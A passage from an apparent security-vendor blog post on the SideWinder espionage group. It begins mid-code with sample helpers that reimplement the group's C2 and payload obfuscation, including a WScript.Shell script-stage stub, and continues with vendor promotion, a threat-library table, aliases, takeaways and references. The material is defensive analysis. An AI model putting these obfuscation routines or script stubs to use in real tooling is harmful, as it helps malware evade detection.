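# Constructed samples (not captured traffic or real implant bytes).
SAMPLE_BEACON = b'{"id":"WIN-7","cmd":"sysinfo"}'
SAMPLE_WIRE = c2_encode(SAMPLE_BEACON)
SAMPLE_KEY = bytes(range(32))
SAMPLE_IMPLANT = stealerbot_encrypt(b"MZ" + b"\x90" * 30, SAMPLE_KEY)
SAMPLE_STAGE = rtf_stage_decode(b'<script>new ActiveXObject("WScript.Shell")</script>')  # XOR is symmetric

if __name__ == "__main__":
    print(SAMPLE_WIRE)
    print(c2_decode(SAMPLE_WIRE))
    print(stealerbot_decrypt(SAMPLE_IMPLANT)[:2])
    print(rtf_stage_decode(SAMPLE_STAGE))
```

Because the NPA key is applied to base64 text rather than to raw bytes, a network signature on the inner layer has to look for the XOR of the base64 alphabet, which is why the outer two base64 layers are enough to defeat naive string matching yet add no real secrecy.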

How Does Picus Simulate SideWinder Attacks?

We also strongly suggest simulating SideWinder Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for SideWinder:

Threat ID   Threat Name                                                           Attack Module
90234       Sidewinder Threat Group Campaign Malware Downloader Email Threat       Network Infiltration
50150       Sidewinder Threat Group Campaign Malware Downloader Download Threat    Network Infiltration
29210       Sidewinder Threat Group Campaign Malware Download Threat               Network Infiltration
20419       Sidewinder Threat Group Campaign Malware Email Threat                  Network Infiltration
73639       Sidewinder Threat Group Campaign Malware Email Threat                  Network Infiltration
45965       Sidewinder Threat Group Campaign Malware Download Threat               Network Infiltration
75691       SideWinder Threat Group Campaign                                       Windows Endpoint

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

What Are the Aliases of the SideWinder Group?

SideWinder is also known as: T-APT-04, Rattlesnake, Razor Tiger, APT-C-17, Hardcore Nationalist, HN2, APT-Q-39, BabyElephant, GroupA21.

Key Takeaways

  • SideWinder is a long-running cyber espionage group active since at least 2012, with steadily expanding global targeting.
  • Initial access relies heavily on spearphishing attachments, links, and malicious scripting environments.
  • Persistence, execution, and privilege escalation are driven by scheduled tasks, autostart scripts, UAC bypasses, and multi-stage script chains.
  • Defense evasion includes obfuscation, hidden files, DLL side loading, and extensive cleanup routines.
  • Credential theft targets RDP, Windows credential stores, and browser data using advanced hooking and token-grabbing tools.
  • Command and control uses rotating servers, encrypted channels, web service-based exfiltration, and tunneling utilities.

References

[1] “OLD SNAKE, NEW SKIN.” Accessed: Nov. 16, 2025. [Online]. Available: https://go.group-ib.com/report-sidewinder-2023

[2] “A global perspective of the SideWinder APT.” Accessed: Nov. 16, 2025. [Online]. Available: https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf

[3] “Sidewinder APT Group Campaign Analysis,” Rewterz - Revolutionizing Cybersecurity. Accessed: Nov. 16, 2025. [Online]. Available: https://rewterz.com/threats/sidewinder-apt-group-campaign-analysis

[4] G. Dedola, “SideWinder targets the maritime and nuclear sectors with an updated toolset,” Kaspersky. Accessed: Nov. 16, 2025. [Online]. Available: https://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/

[5] G. Dedola, “Beyond the Surface: the evolution and expansion of the SideWinder APT group,” Kaspersky. Accessed: Nov. 16, 2025. [Online]. Available: https://securelist.com/sidewinder-apt/114089/
